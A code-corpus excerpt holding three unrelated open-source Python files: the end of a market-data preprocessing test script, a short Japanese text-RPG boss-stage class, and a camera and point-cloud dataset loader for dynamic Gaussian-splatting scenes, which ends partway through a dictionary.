    logging.info('Please, check that the difference in amount of rows for the same date period makes sense.')
    logging.info('For a single date, this should be truth: ' +
                 'len_current_df * float(scl)/float(sol) - float(scl)/float(sol) + 1 == len_compared_df * sol')
    logging.info('scl and sol are the amount of seconds of the current and compared level respectively. '+
                 'If current_df level =30 min level, then scl=30*60.')
    plot_stats(cl_df, ol_df, scl, sol)
    # if the other level to compare against is lower than the current one, trigger the following tests
    # added extra checks just in case
    if sol < scl and int(c_level[0]) % int(o_level[0]) == 0 and c_level[1] == o_level[1]:
        logging.info('Test 2: Check if lower levels miss any row that they shouldn\'t')
        test_subsets(cl_df, ol_df)
        logging.info('Test 3: Max and Min dates:')
        max_and_min_dates(cl_df, ol_df)
        logging.info('Test 4: Any null values?')
        any_nulls(cl_df[featureset], ol_df[featureset])
        logging.info('Test 5: Percentage of gaps. ' +
                     'It should map the percentages that we already have in the same files ' +
                     'regarding to the class distribution.')
        get_percentage_of_gaps(cl_df, ol_df)
def compare_efts(ce_df, oe_df, c_eft, o_eft):
    """Compare two EFTs at the same level/period: they must have the same rows.

    Delegates the length/subset checks to test_number_of_rows with
    comparison_type 'eft'.
    """
    logging.info('')
    logging.info('#################################')
    logging.info('')
    logging.info('o_eft: '+str(o_eft))
    logging.info('c_eft: '+str(c_eft))
    logging.info('')
    logging.info('Test 0: Stats and counts - Judge manually below to determined if it PASSED. ' +
                 'IBEX may be the most different one due to bank holidays in Spain.')
    test_number_of_rows(ce_df, oe_df, 'eft', 1, 1)
def run_tests_for_config(config):
    """Run all comparisons for one EFT/level/period combination.

    Part 1 compares the current EFT against every EFT in
    config['compare_efts'] at the same level; part 2 compares the current
    level against every level in config['compare_against'] for the same EFT.
    """
    # Load all the data for the current level and period in a Dataframe
    cl_df, min_time = load_data(config)
    logging.info('First part in testing, comparing to efts at same level:')
    for other_eft in config['compare_efts']:
        logging.info(' ///// ')
        logging.info('Comparing to efts: '+other_eft)
        # Load DF to compare against
        oe_config = config.copy()
        oe_config['eft'] = other_eft
        oe_df, _ = load_data(new_config(oe_config)) # only getting DF, as min_time doesn't need to update
        compare_efts(cl_df, oe_df, config['eft'], oe_config['eft'])
        logging.info(' ///// ')
    logging.info('Second part in testing, comparing different levels of the same EFT and period:')
    c_level = split_level(config['level'], list(EQUIVALENCE.keys()))
    for other_level in config['compare_against']:
        logging.info(' ///// ')
        logging.info('Comparing to level: '+other_level)
        # Load DF to compare against
        ol_config = config.copy()
        ol_config['level'] = other_level
        # new_config updates some config settings that are dependant on the values changed
        ol_df, _ = load_data(new_config(ol_config), min_time) # only getting DF, as min_time doesn't need to update
        # Tests
        o_level = split_level(other_level, list(EQUIVALENCE.keys()))
        compare_levels(cl_df, ol_df, c_level, o_level, config['featureset'])
        logging.info(' ///// ')
def run_tests():
    """Drive the full test matrix: every EFT x period x level in the config."""
    # Load settings and set logging config
    config = load_config()
    config['featureset'].append('gap_t+1') # only for testing (not merging)
    set_logging(config)
    log_new_execution(config)
    for eft in config['efts']:
        print()
        print('EFT: '+str(eft))
        print('------')
        for period in config['periods'].values():
            print('')
            print('Period: '+str(period))
            print('')
            for level in config['levels']:
                print('Level: '+str(level))
                # The shared config dict is mutated in place per iteration.
                config['eft'] = eft
                config['start'] = period[0]
                config['end'] = period[1]
                config['level'] = level
                log_iteration(config)
                run_tests_for_config(new_config(config))
if __name__ == '__main__':
    # Entry point: run the full cross-EFT / cross-level test suite.
    run_tests()
| cetrulin/Quant-Quote-Data-Preprocessing | src/2_testing.py | 2_testing.py | py | 16,897 | python | en | code | 0 | github-code | 36 |
24850285371 | from character import Enemy
from battle import Battle
from system import display_message
class LastCastle:
    """Final stage: the demon king's castle, ending in a boss battle."""

    def __init__(self, player):
        """Create the stage; the boss is scaled to the player's level."""
        self.player = player
        self.enemy = Enemy()
        self.enemy.define_enemy("last_boss", self.player.stats["level"])
        self.battle = Battle(self.player, self.enemy)

    def boss_lines(self):
        """Display the pre-battle dialogue between the boss and the player."""
        display_message('魔王:「良くぞここまでたどり着いた、勇者よ。誉めてやろう。」')
        display_message('%s:「だろ?そして、俺はお前を倒す!」' % (self.player.stats['name']))
        display_message('魔王:「ほう。面白い。出来るものならやってみせよ!」')

    def encounter(self):
        """Announce the boss and start the battle."""
        display_message("%sが現れた!" % (self.enemy.stats["name"]))
        self.battle.start_battle()

    def travel(self):
        """Play through the stage: title card, dialogue, then the fight."""
        display_message("~魔王城~")
        self.boss_lines()
        self.encounter()
| shimeji3207/projects | textrpg/last_castle.py | last_castle.py | py | 941 | python | ja | code | 0 | github-code | 36 |
36992033529 | import os
import sys
from PIL import Image
from scene.cameras import Camera
from typing import NamedTuple
from scene.colmap_loader import read_extrinsics_text, read_intrinsics_text, qvec2rotmat, \
read_extrinsics_binary, read_intrinsics_binary, read_points3D_binary, read_points3D_text
from scene.hyper_loader import Load_hyper_data, format_hyper_data
import torchvision.transforms as transforms
import copy
from utils.graphics_utils import getWorld2View2, focal2fov, fov2focal
import numpy as np
import torch
import json
from pathlib import Path
from plyfile import PlyData, PlyElement
from utils.sh_utils import SH2RGB
from scene.gaussian_model import BasicPointCloud
from utils.general_utils import PILtoTorch
from tqdm import tqdm
class CameraInfo(NamedTuple):
    """Immutable per-camera record: pose, intrinsics (as FoVs), image data
    and the capture time used by the dynamic scene model."""

    uid: int              # camera/intrinsic id
    R: np.array           # rotation matrix
    T: np.array           # translation vector
    FovY: np.array        # vertical field of view
    FovX: np.array        # horizontal field of view
    image: np.array       # image tensor (output of PILtoTorch)
    image_path: str
    image_name: str
    width: int
    height: int
    time : float          # timestamp (normalised to [0, 1] by the loaders)
    mask: np.array
class SceneInfo(NamedTuple):
    """Bundle of everything a Scene needs: point cloud, camera splits,
    normalisation parameters and the temporal extent."""

    point_cloud: BasicPointCloud
    train_cameras: list
    test_cameras: list
    video_cameras: list       # cameras used for rendering a video path
    nerf_normalization: dict  # {"translate": ..., "radius": ...}
    ply_path: str
    maxtime: int              # maximum raw timestamp in the dataset
def getNerfppNorm(cam_info):
    """Compute the NeRF++-style scene normalisation (translate + radius)
    from the camera extrinsics in `cam_info`."""

    def _center_and_diagonal(centers):
        # Average the 3x1 camera centres and measure the largest distance
        # from any camera to that average.
        stacked = np.hstack(centers)
        avg = np.mean(stacked, axis=1, keepdims=True)
        distances = np.linalg.norm(stacked - avg, axis=0, keepdims=True)
        return avg.flatten(), np.max(distances)

    centers = []
    for cam in cam_info:
        c2w = np.linalg.inv(getWorld2View2(cam.R, cam.T))
        centers.append(c2w[:3, 3:4])

    center, diagonal = _center_and_diagonal(centers)
    # 10% margin on the enclosing radius.
    return {"translate": -center, "radius": diagonal * 1.1}
def readColmapCameras(cam_extrinsics, cam_intrinsics, images_folder):
    """Build CameraInfo records from COLMAP intrinsics/extrinsics.

    Args:
        cam_extrinsics: dict of COLMAP image records (qvec/tvec/camera_id/name).
        cam_intrinsics: dict of COLMAP camera records keyed by camera id.
        images_folder: directory containing the images referenced by name.
    """
    cam_infos = []
    for idx, key in enumerate(cam_extrinsics):
        sys.stdout.write('\r')
        # the exact output you're looking for:
        sys.stdout.write("Reading camera {}/{}".format(idx+1, len(cam_extrinsics)))
        sys.stdout.flush()

        extr = cam_extrinsics[key]
        intr = cam_intrinsics[extr.camera_id]
        height = intr.height
        width = intr.width

        uid = intr.id
        R = np.transpose(qvec2rotmat(extr.qvec))
        T = np.array(extr.tvec)

        if intr.model in ["SIMPLE_PINHOLE", "SIMPLE_RADIAL"]:
            # NOTE(review): SIMPLE_RADIAL is handled as if distortion-free —
            # radial params are ignored; confirm inputs are undistorted.
            focal_length_x = intr.params[0]
            FovY = focal2fov(focal_length_x, height)
            FovX = focal2fov(focal_length_x, width)
        elif intr.model=="PINHOLE":
            focal_length_x = intr.params[0]
            focal_length_y = intr.params[1]
            FovY = focal2fov(focal_length_y, height)
            FovX = focal2fov(focal_length_x, width)
        elif intr.model == "OPENCV":
            # NOTE(review): OPENCV distortion coefficients are likewise ignored.
            focal_length_x = intr.params[0]
            focal_length_y = intr.params[1]
            FovY = focal2fov(focal_length_y, height)
            FovX = focal2fov(focal_length_x, width)
        else:
            assert False, "Colmap camera model not handled: only undistorted datasets (PINHOLE or SIMPLE_PINHOLE cameras) supported!"

        image_path = os.path.join(images_folder, os.path.basename(extr.name))
        image_name = os.path.basename(image_path).split(".")[0]
        image = Image.open(image_path)
        image = PILtoTorch(image,None)

        cam_info = CameraInfo(uid=uid, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
                              image_path=image_path, image_name=image_name, width=width, height=height,
                              time = 0, mask=None)
        cam_infos.append(cam_info)
    sys.stdout.write('\n')
    return cam_infos
def fetchPly(path):
    """Read a .ply file into a BasicPointCloud (positions, RGB scaled to
    [0, 1], normals)."""
    ply = PlyData.read(path)
    vertex = ply['vertex']
    xyz = np.vstack([vertex['x'], vertex['y'], vertex['z']]).T
    rgb = np.vstack([vertex['red'], vertex['green'], vertex['blue']]).T / 255.0
    nrm = np.vstack([vertex['nx'], vertex['ny'], vertex['nz']]).T
    return BasicPointCloud(points=xyz, colors=rgb, normals=nrm)
def storePly(path, xyz, rgb):
    """Write an Nx3 position + Nx3 color point cloud to a .ply file.

    Normals are written as zeros; colors are stored as float32 ('f4').
    """
    # Define the dtype for the structured array
    dtype = [('x', 'f4'), ('y', 'f4'), ('z', 'f4'),
             ('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4'),
             ('red', 'f4'), ('green', 'f4'), ('blue', 'f4')]

    normals = np.zeros_like(xyz)

    elements = np.empty(xyz.shape[0], dtype=dtype)
    # breakpoint()
    attributes = np.concatenate((xyz, normals, rgb), axis=1)
    elements[:] = list(map(tuple, attributes))

    # Create the PlyData object and write to file
    vertex_element = PlyElement.describe(elements, 'vertex')
    ply_data = PlyData([vertex_element])
    ply_data.write(path)
def readColmapSceneInfo(path, images, eval, llffhold=8):
    """Load a static COLMAP reconstruction as a SceneInfo.

    Args:
        path: scene root containing sparse/0 with the COLMAP output.
        images: image subdirectory name (defaults to "images" when None).
        eval: when True, hold out every `llffhold`-th camera for testing.
        llffhold: test-set stride used when eval is True.
    """
    # Binary COLMAP output is preferred; fall back to the text format.
    try:
        cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.bin")
        cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.bin")
        cam_extrinsics = read_extrinsics_binary(cameras_extrinsic_file)
        cam_intrinsics = read_intrinsics_binary(cameras_intrinsic_file)
    except:
        cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.txt")
        cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.txt")
        cam_extrinsics = read_extrinsics_text(cameras_extrinsic_file)
        cam_intrinsics = read_intrinsics_text(cameras_intrinsic_file)

    reading_dir = "images" if images == None else images
    cam_infos_unsorted = readColmapCameras(cam_extrinsics=cam_extrinsics, cam_intrinsics=cam_intrinsics, images_folder=os.path.join(path, reading_dir))
    cam_infos = sorted(cam_infos_unsorted.copy(), key = lambda x : x.image_name)
    # breakpoint()
    if eval:
        train_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold != 0]
        test_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold == 0]
    else:
        train_cam_infos = cam_infos
        test_cam_infos = []

    nerf_normalization = getNerfppNorm(train_cam_infos)

    ply_path = os.path.join(path, "sparse/0/points3D.ply")
    bin_path = os.path.join(path, "sparse/0/points3D.bin")
    txt_path = os.path.join(path, "sparse/0/points3D.txt")
    if not os.path.exists(ply_path):
        print("Converting point3d.bin to .ply, will happen only the first time you open the scene.")
        try:
            xyz, rgb, _ = read_points3D_binary(bin_path)
        except:
            xyz, rgb, _ = read_points3D_text(txt_path)
        storePly(ply_path, xyz, rgb)
    try:
        pcd = fetchPly(ply_path)
    except:
        pcd = None

    # Static scene: maxtime 0, video cameras reuse the train split.
    scene_info = SceneInfo(point_cloud=pcd,
                           train_cameras=train_cam_infos,
                           test_cameras=test_cam_infos,
                           video_cameras=train_cam_infos,
                           maxtime=0,
                           nerf_normalization=nerf_normalization,
                           ply_path=ply_path)
    return scene_info
def generateCamerasFromTransforms(path, template_transformsfile, extension, maxtime):
    """Synthesise a spherical camera path for video rendering.

    Poses are sampled on a circle (160 steps over [-180, 180) degrees, at
    -30 degrees elevation and radius 4) and paired with timestamps spanning
    [0, maxtime]; intrinsics and image size come from the first frame of
    the template transforms file.
    """
    trans_t = lambda t : torch.Tensor([
        [1,0,0,0],
        [0,1,0,0],
        [0,0,1,t],
        [0,0,0,1]]).float()

    rot_phi = lambda phi : torch.Tensor([
        [1,0,0,0],
        [0,np.cos(phi),-np.sin(phi),0],
        [0,np.sin(phi), np.cos(phi),0],
        [0,0,0,1]]).float()

    rot_theta = lambda th : torch.Tensor([
        [np.cos(th),0,-np.sin(th),0],
        [0,1,0,0],
        [np.sin(th),0, np.cos(th),0],
        [0,0,0,1]]).float()

    def pose_spherical(theta, phi, radius):
        # Compose translation and the two rotations, then remap axes into
        # the dataset's coordinate convention.
        c2w = trans_t(radius)
        c2w = rot_phi(phi/180.*np.pi) @ c2w
        c2w = rot_theta(theta/180.*np.pi) @ c2w
        c2w = torch.Tensor(np.array([[-1,0,0,0],[0,0,1,0],[0,1,0,0],[0,0,0,1]])) @ c2w
        return c2w

    cam_infos = []
    # generate render poses and times
    render_poses = torch.stack([pose_spherical(angle, -30.0, 4.0) for angle in np.linspace(-180,180,160+1)[:-1]], 0)
    render_times = torch.linspace(0,maxtime,render_poses.shape[0])
    with open(os.path.join(path, template_transformsfile)) as json_file:
        template_json = json.load(json_file)
        try:
            fovx = template_json["camera_angle_x"]
        except:
            fovx = focal2fov(template_json["fl_x"], template_json['w'])
    print("hello!!!!")
    # breakpoint()
    # load a single image to get image info.
    for idx, frame in enumerate(template_json["frames"]):
        cam_name = os.path.join(path, frame["file_path"] + extension)
        image_path = os.path.join(path, cam_name)
        image_name = Path(cam_name).stem
        image = Image.open(image_path)
        im_data = np.array(image.convert("RGBA"))
        image = PILtoTorch(image,(800,800))
        break
    # format information
    for idx, (time, poses) in enumerate(zip(render_times,render_poses)):
        # Normalise the timestamp to [0, 1].
        time = time/maxtime
        matrix = np.linalg.inv(np.array(poses))
        R = -np.transpose(matrix[:3,:3])
        R[:,0] = -R[:,0]
        T = -matrix[:3, 3]
        fovy = focal2fov(fov2focal(fovx, image.shape[1]), image.shape[2])
        FovY = fovy
        FovX = fovx
        cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
                            image_path=None, image_name=None, width=image.shape[1], height=image.shape[2],
                            time = time, mask=None))
    return cam_infos
def readCamerasFromTransforms(path, transformsfile, white_background, extension=".png", mapper = {}):
    """Load CameraInfo records from a Blender-style transforms JSON.

    Args:
        path: scene root directory.
        transformsfile: e.g. "transforms_train.json".
        white_background: blend RGBA images onto white instead of black.
        extension: image file extension appended to each frame's file_path.
        mapper: raw timestamp -> normalised timestamp (see read_timeline).
                NOTE(review): mutable default argument — callers always pass
                a mapper; left as-is to avoid an interface change.
    """
    cam_infos = []
    with open(os.path.join(path, transformsfile)) as json_file:
        contents = json.load(json_file)
        try:
            fovx = contents["camera_angle_x"]
        except:
            fovx = focal2fov(contents['fl_x'],contents['w'])

        frames = contents["frames"]
        for idx, frame in enumerate(frames):
            cam_name = os.path.join(path, frame["file_path"] + extension)
            time = mapper[frame["time"]]
            matrix = np.linalg.inv(np.array(frame["transform_matrix"]))
            R = -np.transpose(matrix[:3,:3])
            R[:,0] = -R[:,0]
            T = -matrix[:3, 3]

            image_path = os.path.join(path, cam_name)
            image_name = Path(cam_name).stem
            image = Image.open(image_path)

            im_data = np.array(image.convert("RGBA"))

            # Alpha-composite onto the chosen background colour.
            bg = np.array([1,1,1]) if white_background else np.array([0, 0, 0])

            norm_data = im_data / 255.0
            arr = norm_data[:,:,:3] * norm_data[:, :, 3:4] + bg * (1 - norm_data[:, :, 3:4])
            image = Image.fromarray(np.array(arr*255.0, dtype=np.byte), "RGB")
            image = PILtoTorch(image,(800,800))
            fovy = focal2fov(fov2focal(fovx, image.shape[1]), image.shape[2])
            FovY = fovy
            FovX = fovx
            cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
                            image_path=image_path, image_name=image_name, width=image.shape[1], height=image.shape[2],
                            time = time, mask=None))

    return cam_infos
def read_timeline(path):
    """Collect the sorted union of frame timestamps from the train/test
    transforms files and map each raw time to a normalised [0, 1] value.

    Returns:
        tuple: (dict raw_time -> raw_time / max_time, max raw time).
    """
    def _frame_times(filename):
        with open(os.path.join(path, filename)) as fh:
            return [frame["time"] for frame in json.load(fh)["frames"]]

    time_line = sorted(set(_frame_times("transforms_train.json") +
                           _frame_times("transforms_test.json")))
    max_time_float = max(time_line)
    timestamp_mapper = {t: t / max_time_float for t in time_line}
    return timestamp_mapper, max_time_float
def readNerfSyntheticInfo(path, white_background, eval, extension=".png"):
    """Load a dynamic NeRF-synthetic (Blender) dataset as a SceneInfo.

    Reads train/test transforms (with timestamps normalised via
    read_timeline), generates a spherical video path, and initialises the
    point cloud from fused.ply or random points when no fused.ply exists.
    """
    timestamp_mapper, max_time = read_timeline(path)
    print("Reading Training Transforms")
    train_cam_infos = readCamerasFromTransforms(path, "transforms_train.json", white_background, extension, timestamp_mapper)
    print("Reading Test Transforms")
    test_cam_infos = readCamerasFromTransforms(path, "transforms_test.json", white_background, extension, timestamp_mapper)
    print("Generating Video Transforms")
    video_cam_infos = generateCamerasFromTransforms(path, "transforms_train.json", extension, max_time)
    if not eval:
        # Without evaluation, all cameras are used for training.
        train_cam_infos.extend(test_cam_infos)
        test_cam_infos = []

    nerf_normalization = getNerfppNorm(train_cam_infos)

    ply_path = os.path.join(path, "fused.ply")
    if not os.path.exists(ply_path):
        # Since this data set has no colmap data, we start with random points
        num_pts = 2000
        print(f"Generating random point cloud ({num_pts})...")

        # We create random points inside the bounds of the synthetic Blender scenes
        xyz = np.random.random((num_pts, 3)) * 2.6 - 1.3
        shs = np.random.random((num_pts, 3)) / 255.0
        pcd = BasicPointCloud(points=xyz, colors=SH2RGB(shs), normals=np.zeros((num_pts, 3)))
        # storePly(ply_path, xyz, SH2RGB(shs) * 255)
    else:
        pcd = fetchPly(ply_path)
        # xyz = -np.array(pcd.points)
        # pcd = pcd._replace(points=xyz)
    scene_info = SceneInfo(point_cloud=pcd,
                           train_cameras=train_cam_infos,
                           test_cameras=test_cam_infos,
                           video_cameras=video_cam_infos,
                           nerf_normalization=nerf_normalization,
                           ply_path=ply_path,
                           maxtime=max_time
                           )
    return scene_info
def format_infos(dataset,split):
    """Convert a dataset split into a list of CameraInfo objects.

    Only the "train" split produces cameras; any other split returns [].
    The first image of the dataset is reused for every camera.
    """
    # loading
    cameras = []
    image = dataset[0][0]
    if split == "train":
        for idx in tqdm(range(len(dataset))):
            image_path = None
            image_name = f"{idx}"
            time = dataset.image_times[idx]
            # matrix = np.linalg.inv(np.array(pose))
            R,T = dataset.load_pose(idx)
            # NOTE(review): FovX is computed from image.shape[1] (used as
            # height below) and FovY from image.shape[2] (used as width) —
            # the opposite pairing of format_render_poses. Confirm which
            # convention is intended.
            FovX = focal2fov(dataset.focal[0], image.shape[1])
            FovY = focal2fov(dataset.focal[0], image.shape[2])
            cameras.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
                                image_path=image_path, image_name=image_name, width=image.shape[2], height=image.shape[1],
                                time = time, mask=None))
    return cameras
def readHyperDataInfos(datadir,use_bg_points,eval):
    """Build a SceneInfo for a NeRFies/HyperNeRF dataset.

    Loads train/test splits at half resolution (ratio 0.5), reuses a deep
    copy of the test split as the video split, and reads the downsampled
    point cloud. Also writes a camera-orientation debug plot (``output.png``)
    via plot_camera_orientations.

    NOTE(review): the ``eval`` argument is accepted but never used here.
    """
    train_cam_infos = Load_hyper_data(datadir,0.5,use_bg_points,split ="train")
    test_cam_infos = Load_hyper_data(datadir,0.5,use_bg_points,split="test")
    print("load finished")
    train_cam = format_hyper_data(train_cam_infos,"train")
    print("format finished")
    max_time = train_cam_infos.max_time
    video_cam_infos = copy.deepcopy(test_cam_infos)
    video_cam_infos.split="video"
    ply_path = os.path.join(datadir, "points3D_downsample.ply")
    pcd = fetchPly(ply_path)
    xyz = np.array(pcd.points)
    pcd = pcd._replace(points=xyz)
    nerf_normalization = getNerfppNorm(train_cam)
    plot_camera_orientations(train_cam_infos, pcd.points)
    scene_info = SceneInfo(point_cloud=pcd,
                           train_cameras=train_cam_infos,
                           test_cameras=test_cam_infos,
                           video_cameras=video_cam_infos,
                           nerf_normalization=nerf_normalization,
                           ply_path=ply_path,
                           maxtime=max_time
                           )
    return scene_info
def format_render_poses(poses,data_infos):
    """Convert a list of render poses into CameraInfo objects.

    Times are spread uniformly over [0, 1) across the poses; the first image
    of the dataset is reused for every camera.
    """
    cameras = []
    tensor_to_pil = transforms.ToPILImage()  # NOTE(review): unused here
    len_poses = len(poses)
    times = [i/len_poses for i in range(len_poses)]
    image = data_infos[0][0]
    for idx, p in tqdm(enumerate(poses)):
        # image = None
        image_path = None
        image_name = f"{idx}"
        time = times[idx]
        pose = np.eye(4)
        pose[:3,:] = p[:3,:]
        # matrix = np.linalg.inv(np.array(pose))
        R = pose[:3,:3]
        # Negate the rotation, then re-negate its first column (sign-flip
        # convention change for the renderer's coordinate frame).
        R = - R
        R[:,0] = -R[:,0]
        T = -pose[:3,3].dot(R)
        FovX = focal2fov(data_infos.focal[0], image.shape[2])
        FovY = focal2fov(data_infos.focal[0], image.shape[1])
        cameras.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image,
                            image_path=image_path, image_name=image_name, width=image.shape[2], height=image.shape[1],
                            time = time, mask=None))
    return cameras
def add_points(pointsclouds, xyz_min, xyz_max, num_new_points=100000):
    """Pad a point cloud with uniformly random extra points.

    Fixes: the original shadowed this function's own name with a local
    variable (``add_points = ...``), hard-coded the point count, and called
    ``_replace`` three times; the count is now a backward-compatible
    parameter and the namedtuple is rebuilt in one call.

    Args:
        pointsclouds: BasicPointCloud-like namedtuple with ``points``,
            ``colors`` and ``normals`` arrays of shape (N, 3).
        xyz_min, xyz_max: per-axis bounds for the sampled positions.
        num_new_points: number of random points to append (default keeps the
            original hard-coded 100000).

    Returns:
        A new point cloud with the random points/colors/normals appended.
    """
    extra_xyz = ((np.random.random((num_new_points, 3))) * (xyz_max - xyz_min)
                 + xyz_min).astype(np.float32)
    extra_colors = np.random.random((num_new_points, 3)).astype(np.float32)
    extra_normals = np.random.random((num_new_points, 3)).astype(np.float32)
    return pointsclouds._replace(
        points=np.vstack([pointsclouds.points, extra_xyz]),
        colors=np.vstack([pointsclouds.colors, extra_colors]),
        normals=np.vstack([pointsclouds.normals, extra_normals]),
    )
def readdynerfInfo(datadir,use_bg_points,eval):
    """Build a SceneInfo for a DyNeRF / Neural-3D-Video dataset.

    NOTE(review): ``use_bg_points`` and ``eval`` are accepted but unused,
    and ``maxtime`` is hard-coded to 300 — confirm these are intentional.
    """
    # loading all the data follow hexplane format
    # ply_path = os.path.join(datadir, "points3D_dense.ply")
    ply_path = os.path.join(datadir, "points3D_downsample2.ply")
    from scene.neural_3D_dataset_NDC import Neural3D_NDC_Dataset
    train_dataset = Neural3D_NDC_Dataset(
        datadir,
        "train",
        1.0,
        time_scale=1,
        scene_bbox_min=[-2.5, -2.0, -1.0],
        scene_bbox_max=[2.5, 2.0, 1.0],
        eval_index=0,
    )
    test_dataset = Neural3D_NDC_Dataset(
        datadir,
        "test",
        1.0,
        time_scale=1,
        scene_bbox_min=[-2.5, -2.0, -1.0],
        scene_bbox_max=[2.5, 2.0, 1.0],
        eval_index=0,
    )
    train_cam_infos = format_infos(train_dataset,"train")
    val_cam_infos = format_render_poses(test_dataset.val_poses,test_dataset)
    nerf_normalization = getNerfppNorm(train_cam_infos)
    # xyz = np.load
    pcd = fetchPly(ply_path)
    print("origin points,",pcd.points.shape[0])
    print("after points,",pcd.points.shape[0])
    # Note: train/test *datasets* (not CameraInfo lists) go into SceneInfo.
    scene_info = SceneInfo(point_cloud=pcd,
                           train_cameras=train_dataset,
                           test_cameras=test_dataset,
                           video_cameras=val_cam_infos,
                           nerf_normalization=nerf_normalization,
                           ply_path=ply_path,
                           maxtime=300
                           )
    return scene_info
def setup_camera(w, h, k, w2c, near=0.01, far=100):
    """Build GaussianRasterizationSettings from intrinsics/extrinsics.

    Args:
        w, h: image width/height in pixels.
        k: 3x3 intrinsics matrix (fx, fy, cx, cy are read from it).
        w2c: 4x4 world-to-camera matrix.
        near, far: clip-plane distances for the projection matrix.
    """
    from diff_gaussian_rasterization import GaussianRasterizationSettings as Camera
    fx, fy, cx, cy = k[0][0], k[1][1], k[0][2], k[1][2]
    w2c = torch.tensor(w2c).cuda().float()
    # Camera position in world space = translation part of c2w.
    cam_center = torch.inverse(w2c)[:3, 3]
    w2c = w2c.unsqueeze(0).transpose(1, 2)
    # Perspective projection built from the pinhole intrinsics.
    opengl_proj = torch.tensor([[2 * fx / w, 0.0, -(w - 2 * cx) / w, 0.0],
                                [0.0, 2 * fy / h, -(h - 2 * cy) / h, 0.0],
                                [0.0, 0.0, far / (far - near), -(far * near) / (far - near)],
                                [0.0, 0.0, 1.0, 0.0]]).cuda().float().unsqueeze(0).transpose(1, 2)
    full_proj = w2c.bmm(opengl_proj)
    cam = Camera(
        image_height=h,
        image_width=w,
        tanfovx=w / (2 * fx),
        tanfovy=h / (2 * fy),
        bg=torch.tensor([0, 0, 0], dtype=torch.float32, device="cuda"),
        scale_modifier=1.0,
        viewmatrix=w2c,
        projmatrix=full_proj,
        sh_degree=0,
        campos=cam_center,
        prefiltered=False,
        debug=True
    )
    return cam
def plot_camera_orientations(cam_list, xyz):
    """Save a 3D debug plot of camera orientations to ``output.png``.

    Scatter-plots the point cloud (clipped to a cube of half-width 2) in red
    and draws one quiver arrow per camera along R @ [0, 0, 1].
    """
    import matplotlib.pyplot as plt
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    # ax2 = fig.add_subplot(122, projection='3d')
    # xyz = xyz[xyz[:,0]<1]
    threshold=2
    xyz = xyz[(xyz[:, 0] >= -threshold) & (xyz[:, 0] <= threshold) &
          (xyz[:, 1] >= -threshold) & (xyz[:, 1] <= threshold) &
          (xyz[:, 2] >= -threshold) & (xyz[:, 2] <= threshold)]
    ax.scatter(xyz[:,0],xyz[:,1],xyz[:,2],c='r',s=0.1)
    for cam in tqdm(cam_list):
        # Extract the rotation R and translation T of this camera.
        R = cam.R
        T = cam.T
        direction = R @ np.array([0, 0, 1])
        ax.quiver(T[0], T[1], T[2], direction[0], direction[1], direction[2], length=1)
    ax.set_xlabel('X Axis')
    ax.set_ylabel('Y Axis')
    ax.set_zlabel('Z Axis')
    plt.savefig("output.png")
    # breakpoint()
def readPanopticmeta(datadir, json_path):
    """Read a PanopticSports meta file and build per-frame camera records.

    Returns:
        (cam_infos, max_time, scene_radius): list of dicts with "camera",
        "time" and "image" keys, the number of frames, and a scene radius
        derived from the first frame's camera centers.
    """
    with open(os.path.join(datadir,json_path)) as f:
        test_meta = json.load(f)
    w = test_meta['w']
    h = test_meta['h']
    max_time = len(test_meta['fn'])
    cam_infos = []
    for index in range(len(test_meta['fn'])):
        focals = test_meta['k'][index]
        w2cs = test_meta['w2c'][index]
        fns = test_meta['fn'][index]
        cam_ids = test_meta['cam_id'][index]
        # Normalised timestamp in [0, 1) for this frame index.
        time = index / len(test_meta['fn'])
        # breakpoint()
        for focal, w2c, fn, cam in zip(focals, w2cs, fns, cam_ids):
            image_path = os.path.join(datadir,"ims")
            image_name=fn
            # breakpoint()
            image = Image.open(os.path.join(datadir,"ims",fn))
            im_data = np.array(image.convert("RGBA"))
            # breakpoint()
            # Keep only the RGB channels after the tensor conversion.
            im_data = PILtoTorch(im_data,None)[:3,:,:]
            # breakpoint()
            # print(w2c,focal,image_name)
            camera = setup_camera(w, h, focal, w2c)
            cam_infos.append({
                "camera":camera,
                "time":time,
                "image":im_data})
    cam_centers = np.linalg.inv(test_meta['w2c'][0])[:, :3, 3] # Get scene radius
    scene_radius = 1.1 * np.max(np.linalg.norm(cam_centers - np.mean(cam_centers, 0)[None], axis=-1))
    # breakpoint()
    return cam_infos, max_time, scene_radius
def readPanopticSportsinfos(datadir):
    """Build a SceneInfo for the PanopticSports dataset.

    The test cameras double as the video split, and the point cloud is
    seeded from ``init_pt_cld.npz`` (re-saved as a .ply for later use).
    """
    train_cam_infos, max_time, scene_radius = readPanopticmeta(datadir, "train_meta.json")
    test_cam_infos,_, _ = readPanopticmeta(datadir, "test_meta.json")
    nerf_normalization = {
        "radius":scene_radius,
        "translate":torch.tensor([0,0,0])
    }
    ply_path = os.path.join(datadir, "pointd3D.ply")
    # Since this data set has no colmap data, we start with random points
    plz_path = os.path.join(datadir, "init_pt_cld.npz")
    data = np.load(plz_path)["data"]
    # Columns 0-2 are positions, 3-5 are RGB colors.
    xyz = data[:,:3]
    rgb = data[:,3:6]
    num_pts = xyz.shape[0]
    pcd = BasicPointCloud(points=xyz, colors=rgb, normals=np.ones((num_pts, 3)))
    storePly(ply_path, xyz, rgb)
    # pcd = fetchPly(ply_path)
    # breakpoint()
    scene_info = SceneInfo(point_cloud=pcd,
                           train_cameras=train_cam_infos,
                           test_cameras=test_cam_infos,
                           video_cameras=test_cam_infos,
                           nerf_normalization=nerf_normalization,
                           ply_path=ply_path,
                           maxtime=max_time,
                           )
    return scene_info
# Registry mapping scene-type names (chosen at load time) to reader functions.
sceneLoadTypeCallbacks = {
    "Colmap": readColmapSceneInfo,
    "Blender" : readNerfSyntheticInfo,
    "dynerf" : readdynerfInfo,
